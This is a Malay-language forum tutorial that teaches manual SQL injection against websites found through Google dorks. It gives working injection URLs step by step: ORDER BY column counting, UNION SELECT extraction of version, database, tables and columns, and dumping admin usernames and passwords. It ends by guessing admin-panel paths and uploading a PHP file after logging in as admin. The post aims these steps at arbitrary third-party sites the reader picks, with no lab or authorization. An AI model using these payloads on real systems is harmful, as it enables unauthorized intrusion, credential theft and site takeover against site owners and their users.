IT Community Malaysia

Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: Lesson 3#- Manually SQL injection (Using Mozilla Firefox and HackBar addon)


Smasher Hax

Status: Offline
Posts: 267
Date:
Lesson 3#- Manually SQL injection (Using Mozilla Firefox and HackBar addon)
Permalink  
 


Salam kpd semua... 

 

Arini aku nk tutor kan hack website secare manually.. crenye agak berbelit ckit n percent utk jadi agk kurg.. cube r sendiri..

sebelum buat aper2, bukak firefox korg pastu install hackbar dulu.. follow link nih:

Tekan Sini

okeh?? terbaek.. 

Step 1: Cari website yang "Vulnerable"

Rakan baek sql adalah google. kte boleh mencari website yang boleh di-hack melalui google dengan cara yg mcm nih.. 

pilih salah 1 dork kt bawah:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Copy and paste kat google.. pastu pilihlah webs yg mne y'all suke..  

Klik disini untuk download semua jenis Google Dork

............

Step 2:Periksa sama ada webs itu adalah Vulnerable(Boleh di-hack) atau tidak

mudah jer. misal nyer kite dah pilih webs yg vuln yg kte pilih dari google dork td adalh ini:

http://www.victimsite.com/index.php?id=2

jadi, cre nyer cume tmbah (') sahaje tanpa jarak dan kurungn dibelakg url td.. contoh nyer:

http://www.victimsite.com/index.php?id=2'

jika telah tmbh (') tp page yg sme dipaparkan, mknenyer webs tu tidak boleh di-hack.. tp kalu dia paparkan page yang lain misalnyer page error ker or page laen yng berkaitan dengn sql, maka webs tuh vulnerable.. hehe..

...............................

Step 3:Mencari bilangan kolum

step ni pon senang lah jugak.. cre nyer cume tambah dibelakag url td dengn nih order by [n]  .....

[n] akan ditukar kpd nilai nombor 1,2,3,... ... Contoh:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

buat binatang nih dari nombor 1 sampai kepada nombor yg mendapat page error... contoh nyer..:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

page yg pertama hingga ke 7 adlah mempunyai kolum.. ini bermakne webs ini mempunyai 7 kolum..  

kadangkala... tidak semue website boleh terime command order by [n]  .... jadi korg boleh cube comand yang nih..  order by [n]-- .... contoh:

http://www.victimsite.com/index.php?id=2 order by 1-- 

................

Step 4:Mencari kolum yang Vulnerable

dalam step ini.. kite akn gunekn command ini  union select [no. kolum :1, 2, 3, ..--]   dan tukarkan no id= kepada nilai negatif (-).. contoh:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

ada sesetengah webs yg tidak boleh terimenilai id= nilai negatif... dan jika command diatas tidak brfungsi.. cube yg ini:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

ia akan memaparkan seperti berikut:

Sql+Injection+2.JPG

ini bermakna kolum yg vulnerable adalah 3 dan 7.. 

sebagai contoh aku pilih kolum no. 3...

...................

Step 5:Mencari versi, database, user

dalam step ini.. kite akn menambah command   "version()" ,... apa yg perlu lkukan adalah gunekan semula command step yg ke-4 tetapi tukarkan kolum 3 kepada version()... contoh:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

ia akan paprkn versi kolumnyer mcm nih:

version as 5.0.1 or 4.3.

lebih kurg r tuh,.. 

so, skunk,, aper yg korg kene buat adalah gunekan command yg td jugak.. tp cume tukarkan kepada database() dan user() masing-masing.. contoh:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

dan

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2, user() ,4,5,6,7--

kalu yang kt ats nih tk brfungsi.. gune yg nih..:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

............................

 

Step 6:Mencari nama tables

okeh.. skrg ade skill utk lakukn step nih.. yg pertame kalu versi nyer adalah 5 dan ke atas.. tukar kn nilai kolum 3 kepada ni   group_concat(table_name)   dan tmbahkan dibelakag url command ni      from information_schema.tables where table_schema=database()   .... contoh:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

dan ia akan memaparkan seperti berikut:

Sql+Injection+3.JPG

dan sekrg.. pilih kolum admin..

Jika versi nyer adlah 4 dan kebawah.. korg kene teke sendiri nme table tuh.. n.. part versi 4 ke bawah yg paling aku bosan sekali... haizzz...

.....................................

Step 7:Mencari nama kolum

sekrg... tukar kn command    group_concat(table_name)   kepada   group_concat(column_name) dan tukarkan     from information_schema.tables where table_schema=database() kepada                     FROM information_schema.columns WHERE table_name=mysqlchar--  ...

seterusnyer.. kite kene tukarkn   string  MySql CHAR()  dengn mysqlchar.

 Cari MysqlChar () untuk Tablename:

bukak addon korg.. perge ke sql>Mysql>MysqlChar()

Sql%20Injection%204.JPG

nnt akn keluar 1 popup kecil pastu korg cume msok kn jer slh stu  nme kolum yg korg jumpe tadi.. aku pilih admin.. 

Sql%20Injection%205.JPG

klik oke...

skunk.. korg akn jumpe CHAR dlm hack toolbar tuh...

Sql%20Injection%206.JPG

copy and paste code kt last url.. contoh:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

skrg ia akn paparkn kolum-kolum yg terkndung  mcm admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc....

skrg temptkn group_concat(column_name) kpd group_concat(name kolum,0x3a,name kolu lain)   dan tukarkan    from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)      kepada    from table_name

contohnyer:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

 

kadangkala ia paprkn yg kolum tidak dijumpai.. so korg kene cube kolum yg lain..

tp.. skrg.. ia akn paparkan password dan username sekali... Cheers...

 

Step 8: Mencari admin login

dalam step nih.. cre korg nk crik admin login cume kene try 1 per 1 url yg kt bawah nih... 

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

yg kt ats nih contoh jer.. kalu nk yang full punyer admin panel url.. download link kt bwh.:

Klik Sini

seterusnyer korg cume login sebagai admin.. pastu upload lah korg punyer file .php tuh.. 

CHEERSSSSSs... tq...

 

  



__________________

I am Sharper

ITC - Internet Moderators

Mods Name: KA

Page 1 of 1  sorted by
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard